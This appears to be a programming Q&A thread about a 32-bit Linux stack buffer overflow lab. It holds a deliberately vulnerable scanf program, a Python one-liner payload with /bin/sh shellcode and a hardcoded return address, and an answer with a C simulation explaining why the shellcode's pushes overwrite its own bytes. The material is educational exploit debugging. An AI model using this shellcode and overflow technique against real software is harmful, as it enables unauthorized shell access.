I have been trying to exploit a simple buffer overflow caused by scanf. I'm working on x86 Linux. The point is to spawn a shell. I successfully overwrote the return address and jumped into my shellcode. But when it executes, some strange thing occurs that I can't understand. The code that I'm working on is taken from here: https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/
Compilation: gcc -fno-stack-protector -z execstack -o vuln vuln.c -m32
ASLR is disabled too. Code:
#include <stdio.h>

void secretFunction()
{
    printf("Congratulations!\n");
    printf("You have entered in the secret function!\n");
}

void echo()
{
    char buffer[20];
    printf("Enter some text:\n");
    scanf("%s", buffer);            /* unbounded %s: writes past buffer[20] on long input */
    printf("You entered: %s\n", buffer);
}

int main()
{
    echo();
    return 0;
}
I try to exploit it using this payload:

python -c "print '\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xe1\xB0\xFF\x34\xF4\xCD\x80' + '\x41' * 3 + '\x42' * 4 + '\x8c\xd6\xff\xff'"

That is shellcode(25) + padding(3) + ebp(4) + return(4), where the last part is the return address. It successfully jumps to my shellcode.
Here is the assembly view of the shellcode (after returning to the overwritten address). I step through the instructions one by one up to mov %esp,%ecx (0xffffd69d).
And then when I try to execute mov %esp,%ecx it goes one byte too close: EIP should point to 0xffffd69f, but it doesn't.
I tested the shellcode separately and it worked:

int main()
{
    /* same 25-byte shellcode; runs because the stack is executable (-z execstack) */
    char buf[] = "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xe1\xB0\xFF\x34\xF4\xCD\x80";
    ((void (*)())(buf))();
    return 0;
}

What did I do wrong, so that it doesn't work?
EDIT: Had to update all pictures. [Image: register dump before 'mov %esp,%ecx']
sub esp, 0x78
to the start of the shellcode should solve the problem
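Why a sub esp at the start of the shellcode helps can be worked out from the frame layout alone. After ret pops the return address, esp sits 4 bytes above the return slot, i.e. at offset 36 from the start of the overflowed buffer, directly above the payload. Every push in the shellcode then stores 4 bytes just below esp, so the five pushes (push eax, push "//sh", push "/bin", push eax, push ebx) walk down through the return slot, the fake ebp, the padding and into the shellcode itself, ending on offsets 16..19, the bytes of the push ebx that is executing. The following C program is an added example (not code from the question, the answer or the linked blog) that simulates that write window over a constructed model of the question's 36-byte frame and reports which shellcode offsets get clobbered for the original payload, for the smallest esp adjustment that avoids the overlap, and for the suggested sub esp, 0x78. It only models memory offsets, so it compiles and runs on any host, 64-bit included.

```c
#include <stdio.h>

/* Constructed model of the frame from the question. Offsets are relative to
 * the start of the overflowed buffer:
 *   [0,25)  shellcode   [25,28) padding   [28,32) saved ebp   [32,36) return
 * `ret` pops the return address, so control arrives at offset 0 with esp at
 * offset 36, i.e. just above the bytes the exploit wrote. */
#define ESP_AFTER_RET 36
#define WORD          4
#define SHELLCODE_LEN 25   /* the 25-byte shellcode from the post */
#define PUSHES        5    /* push eax; push "//sh"; push "/bin"; push eax; push ebx */

struct overlap {
    int clobbered;     /* shellcode bytes overwritten by the shellcode's own pushes */
    int first_hit;     /* lowest overwritten shellcode offset, -1 if none */
    int lowest_write;  /* lowest offset any push writes to */
};

/* esp_adjust models `sub esp, N` prepended to the shellcode (0 = original
 * payload). The prefix is 3 bytes (83 EC imm8 for N <= 127), so the code grows
 * and the padding in front of the saved ebp shrinks by the same amount; the
 * return address must stay at offset 32 either way. */
struct overlap simulate_pushes(int esp_adjust)
{
    int code_len = SHELLCODE_LEN + (esp_adjust ? 3 : 0);
    int esp = ESP_AFTER_RET - esp_adjust;
    struct overlap r = { 0, -1, esp - PUSHES * WORD };

    for (int p = 0; p < PUSHES; p++) {
        esp -= WORD;                             /* push: esp -= 4, then store */
        for (int b = esp; b < esp + WORD; b++) {
            if (b >= 0 && b < code_len) {        /* store lands on code bytes */
                r.clobbered++;
                if (r.first_hit < 0 || b < r.first_hit)
                    r.first_hit = b;
            }
        }
    }
    return r;
}

/* Smallest N that keeps every push strictly below the shellcode: esp must be
 * moved from offset 36 down to offset 0 before the first push. */
int min_esp_adjust(void)
{
    return ESP_AFTER_RET;
}

static void report(const char *label, int esp_adjust)
{
    struct overlap r = simulate_pushes(esp_adjust);
    printf("%-18s sub esp,0x%02x: pushes write offsets %d..%d, "
           "%d shellcode bytes clobbered",
           label, esp_adjust, r.lowest_write, ESP_AFTER_RET - esp_adjust - 1,
           r.clobbered);
    if (r.first_hit >= 0)
        printf(" (first at offset %d)", r.first_hit);
    printf("\n");
}

int main(void)
{
    /* Original payload: offsets 16..24 are hit, and the push ebx at offset 16
     * overwrites the very bytes the CPU fetches next. */
    report("original payload", 0);
    report("minimum fix", min_esp_adjust());
    report("answer's fix", 0x78);
    return 0;
}
```

The practical reading: with the original payload the instruction stream is rewritten underneath the debugger, which explains why single-stepping disagrees with the disassembly view. Any sub esp, N with N at least 36 moves the push window entirely below the injected bytes; 0x78 simply leaves a comfortable margin, and since the prefix adds 3 bytes the 3 padding bytes before the fake ebp must be dropped so the return address stays at offset 32.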